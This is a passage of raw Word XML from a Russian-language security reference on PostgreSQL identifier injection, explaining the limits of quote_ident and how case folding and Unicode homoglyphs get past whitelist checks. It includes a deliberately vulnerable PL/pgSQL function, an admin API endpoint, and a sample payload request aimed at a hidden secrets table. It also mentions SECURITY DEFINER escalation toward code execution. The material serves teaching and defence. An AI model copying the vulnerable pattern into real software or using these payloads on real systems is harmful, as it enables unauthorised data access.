          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bind-параметризация для значений (не identifier).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3.16.4 Конкатенация через ||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — более прямой антипаттерн (без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вообще).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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — эскалация: identifier injection в SD-функции даёт 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payload — это classic stacked-injection. Граница: 3.5 — protocol-level; 3.16.1 — внутри plpgsql EXECUTE.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3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-side analog (та же фундаментальная проблема bind-protocol).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 3.7.2 / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальные RCE-векторы, доступные через 3.16.5 эскалацию.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R18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — research-anchor.</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«String Functions and Operators» /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https://www.postgresql.org/docs/current/functions-string.html#FUNCTIONS-STRING-FORMAT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«PL/pgSQL — Executing Dynamic Commands» — https://www.postgresql.org/docs/current/plpgsql-statements.html#PLPGSQL-STATEMENTS-EXECUTING-DYN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«System Information Functions»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 https://www.postgresql.org/docs/current/functions-info.html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SQL-injection-safe pattern (xflr6 gist, цитируется в R18) — https://gist.github.com/xflr6/33db779acd7fe79faadeb0f28fc053bd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2ndQuadrant blog: «PL/pgSQL dynamic queries» — https://www.2ndquadrant.com/en/blog/dynamic-sql-pl-pgsql/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depesz blog: «Why you should use format() instead of concatenation» — https://www.depesz.com/2013/04/05/waiting-for-9-3-add-format-function-with-i-l-s-conversions/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R18 (sources/research.md, строки 274–291)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16.2 quote_ident() и его ограничения</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quote_ident(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельная функция PostgreSQL, эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Возвращает строку, безопасную для использования как identifier: добавляет double-quotes если нужно, удваивает внутренние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основной защитный инструмент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для identifier-injection в plpgsql, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">но он имеет три критичных ограничения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые часто становятся причиной mis-use:</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`quote_ident` НЕ для значений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для строкового literal нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_literal(text)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format('%L', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или (предпочтительно) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE USING $1</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`quote_ident` НЕ нормализует case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quote_ident('Users')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(точное имя с capital U), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident('users')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(без quotes, lowercase). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разные имена</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для PostgreSQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT FROM "Users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ищет таблицу с capital U; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT FROM users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (без quotes) ищет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(folded к lowercase).</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`quote_ident` НЕ помогает обойти whitelist через Unicode homoglyphs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quote_ident('uѕers')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с Cyrillic 's' U+0455) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uѕers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (без quotes, потому что Cyrillic 's' валиден как identifier-char) — теперь это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разные таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от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с latin 's'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих ограничений с whitelist-проверками создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">false sense of security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: разработчик правильно вызывает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но whitelist проверяется до этого без учёта case/Unicode, и атакующий обходит whitelist, передавая в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значение, которое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">проходит whitelist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (равенство bytes), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">указывает на другую таблицу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (case-fold / Unicode).</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Функция с whitelist-проверкой ДО quote_ident</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app.read_table(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS SETOF record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allowed text[] := ARRAY['public_users', 'public_articles', 'public_comments'];</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Whitelist-проверка</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tbl_name &lt;&gt; ALL(allowed)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'table not in whitelist: %', tbl_name;</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quote_ident вызван — кажется безопасно</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE format('SELECT * FROM %s', quote_ident(tbl_name));</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tbl_name &lt;&gt; ALL(allowed)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точное сравнение bytes. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tbl_name = 'public_users'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, проверка пройдёт; если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'PUBLIC_USERS'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — не пройдёт. Кажется надёжно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application-caller:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/admin/read")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def read_table(tbl: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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT * FROM app.read_table(:t) AS t(id int, data text)"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"t": tbl},</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pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — case-fold bypass + Unicode homoglyph</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — Case-folding atypical setup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий: разработчик добавил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">внутренний admin-table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с double-quoted именем для отличия от public-таблиц:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE "AdminSecrets" (id int, secret text);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO "AdminSecrets" VALUES (1, 'top-secret-config');</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отдельная таблица</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adminsecrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (которой нет). Whitelist не включает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"AdminSecrets"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — потому что разработчик «забыл», что эта таблица существует. Payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /admin/read?tbl=AdminSecrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Whitelist-проверка: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'AdminSecrets' &lt;&gt; ALL(ARRAY['public_users', 'public_articles', 'public_comments'])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не в whitelist). RAISE EXCEPTION — атака не сработала. Хорошо.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но если разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сделал case-insensitive whitelist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
